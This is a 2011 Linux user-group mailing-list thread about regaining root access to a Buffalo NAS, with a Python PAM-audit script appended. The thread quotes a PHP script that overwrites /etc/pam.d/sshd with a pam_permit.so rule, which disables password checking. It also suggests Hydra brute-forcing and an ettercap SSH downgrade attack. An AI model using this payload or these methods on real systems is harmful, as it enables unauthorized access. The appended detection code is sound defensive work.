Is it possible to extract the root password from the file system?

Lisa Kachold lisakachold at obnosis.com
Mon Jul 18 21:20:21 MST 2011


I believe the script.php has to be moved to the webroot directory and given
permissions there I believe, but well if you can't get a login via ssh... --
how to do it?

On Sun, Jul 17, 2011 at 8:58 AM, Mark Phillips
<mark at phillipsmarketing.biz> wrote:

> On Sun, Jul 17, 2011 at 3:54 AM, Lisa Kachold <lisakachold at obnosis.com> wrote:
>
>> There are a lot of password files and dictionary lists on various sites.
>> Backtrack5 contains a good number.
>>
>> But I imagine that it's either not allowing root via ssh or you have the
>> wrong username.
>>
>
> It turns out the box is smarter than a fifth grader.....after a few hydra
> attacks, it started rejecting all the hydra attempts to ssh in via root.
> Once I stopped hydra (after running all night), it took a couple of hours
> before it would respond to ssh attempts from root. It now will ask for the
> root password, but I still have no idea what it is.
>
>>
>> Or it's a truly random string.
>>
> It could be....the password for the zip file to unzip the file system is
>
>  YvSInIQopeipx66t_DCdfEvfP47qeVPhNhAuSYmA4
>
> . Someone retrieved it using a disassembler on the file system.
>
> I did some more reading, and one person was able to use php to allow ssh
> login. The box allows one to create a web space, and it comes with php
> installed. One can edit the php.ini file, and I can upload via ftp a php
> script. The script they suggested is:
> <?php
> $file = '../../../../etc/pam.d/sshd';
> $fh=fopen($file, 'w') or die("can't open file");
> $stringData = "account  required   pam_unix.so\n";
> fwrite($fh, $stringData);
> $stringData = "session  required   pam_unix.so\n";
> fwrite($fh, $stringData);
> $stringData = "auth required pam_permit.so\n";
> fwrite($fh, $stringData);
> fclose($fh);
> ?>
>
> I uploaded the script, but I get a 404 File not Found when I access the
> page. I thought it might be a file permission error since the file is only
> rw. I tried chmod 777 at the ftp prompt, and got the error message File not
> Found, but ls shows it is there.
>
> ftp> ls
> 200 PORT command successful
> 150 Opening ASCII mode data connection for file list
> drwxrwxrwx   2 apache   apache          6 Jul 17 08:23 cgi-bin
> drwxrwxrwx   2 apache   apache         22 Jul 17 08:23 htdocs
> drwxrwxrwx   2 apache   apache         39 Jul 17 08:23 log
> -rw-rw-rw-   1 hammerhead hdusers       335 Jul 17 08:49 script.php
> 226 Transfer complete
> ftp> chmod 777 script.php
> 550 CHMOD 777 script.php: No such file or directory
> ftp>
>
> Is there anything I can change in the php.ini file to make this script
> execute? Or, am I missing something else?
>
> BTW, I cannot ftp as root, but I can ftp as a user I created, hammerhead.
>
> Thanks,
>
> Mark
>
>>
>> On Fri, Jul 15, 2011 at 10:33 PM, Mark Phillips <
>> mark at phillipsmarketing.biz> wrote:
>>
>>> Since this is a drive buffalo, I might try ettercap ssh downgrade attack:
>>>>
>>>> http://openmaniak.com/ettercap_filter.php
>>>> http://sites.google.com/site/clickdeathsquad/Home/cds-ssh-mitmdowngrade
>>>>
>>>> Not sure how a man in the middle attack will work, since I don't know
>>> the password to begin with...
>>>
>>> Or Hydra:
>>>>
>>>> Hydra Instructions:
>>>>
>>>> http://www.youtube.com/watch?v=7CP-JB4QARo
>>>>
>>>>>
>>>>>> Hydra is promising. I tried it with the common passwords list from
>>> openwall. No luck. Do you have any better password lists?
>>>
>>> Thanks,
>>>
>>> Mark
>>>
>>> ---------------------------------------------------
>>> PLUG-discuss mailing list - PLUG-discuss at lists.plug.phoenix.az.us
>>> To subscribe, unsubscribe, or to change your mail settings:
>>> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>>>
>>
>>
>>
>> --
>> (602) 791-8002  Android
>> (623) 239-3392 Skype
>> (623) 688-3392 Google Voice
>> **
>> HomeSmartInternational.com <http://www.homesmartinternational.com>
>
>



-- 
(602) 791-8002  Android
(623) 239-3392 Skype
(623) 688-3392 Google Voice
**
HomeSmartInternational.com <http://www.homesmartinternational.com>
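
The PHP script quoted in this message rewrites /etc/pam.d/sshd so that its only auth rule is pam_permit.so, which makes sshd accept any password. A check for that condition follows, as an added example that is not part of the original thread; the function names, finding labels and the BASELINE and JUMP_STACK samples are constructed for illustration.

```python
import re

# One PAM rule: [-]type  control  module [args]; control may be a [bracketed] list.
RULE = re.compile(r"^-?(auth|account|password|session)\s+(\[[^\]]*\]|\S+)\s+(\S+)")

def parse_rules(text):
    """Return (type, control, module basename) for every rule line in a pam.d file."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blank lines
        m = RULE.match(line)
        if m:
            rules.append((m.group(1), m.group(2), m.group(3).rsplit("/", 1)[-1]))
    return rules

def audit_auth_stack(text):
    """Flag auth stacks that pam_permit.so can satisfy without checking a credential."""
    auth = [(ctl, mod) for typ, ctl, mod in parse_rules(text) if typ == "auth"]
    findings = []
    if auth and all(mod == "pam_permit.so" for _, mod in auth):
        findings.append("permit-only")           # every login attempt succeeds
    elif auth and auth[0] == ("sufficient", "pam_permit.so"):
        findings.append("permit-first")          # succeeds before any real check runs
    return findings

# The three lines the script quoted in the thread writes to /etc/pam.d/sshd.
FROM_THREAD = """account  required   pam_unix.so
session  required   pam_unix.so
auth required pam_permit.so
"""

# Constructed samples (assumptions, not from the thread).
BASELINE = "auth required pam_unix.so\naccount required pam_unix.so\n"
JUMP_STACK = """auth [success=1 default=ignore] pam_unix.so nullok
auth requisite pam_deny.so
auth required pam_permit.so   # normal tail of a jump-based stack
"""

if __name__ == "__main__":
    for name, text in [("thread", FROM_THREAD), ("baseline", BASELINE), ("jump", JUMP_STACK)]:
        print(name, audit_auth_stack(text) or "ok")
```

A pam_permit.so line at the end of a jump-based stack is normal and is not flagged; only a stack that pam_permit.so satisfies on its own is reported.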